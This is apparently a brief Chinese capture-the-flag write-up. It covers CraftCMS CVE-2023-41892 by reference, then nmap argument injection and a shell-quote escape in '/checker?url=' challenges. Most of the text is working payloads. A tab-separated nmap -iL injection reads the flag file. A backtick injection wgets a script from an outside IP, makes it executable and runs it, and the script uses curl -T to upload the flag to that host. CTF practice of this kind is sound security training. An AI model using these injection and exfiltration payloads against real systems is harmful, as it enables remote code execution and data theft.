目录
无聊,随便复现
craftcms
参考:CVE-2023-41892 CraftCMS远程代码执行漏洞分析 | Bmth's blog
MyGO's Live!!!!!
nmap的命令拼接利用参考
BUUCTF-[BUUCTF 2018]Online Tool(单引号逃逸、nmap写文件) - zhengna - 博客园
空格可以用tab键来绕过
flag用通配符来找
最终payload
/checker?url=123456:8080%09-iL%09/flag-????????????????
~AveMujica's Masquerade~
和上一题类似,但是无回显
另外转义用的是shellQuote
shell-quote的绕过参考
/checker?url=1:`:`wget$IFS$9http://27.25.151.98:1337/1.sh$IFS$9-O$IFS$9/tmp/1.sh``:`
/checker?url=1:`:`chmod$IFS$9%2bx$IFS$9/tmp/1.sh``:`
/checker?url=1:`:`/tmp/1.sh``:`
远程的1.sh文件
#!/bin/sh
curl -T /flag-???????????????? http://27.25.151.98:1338
成功外带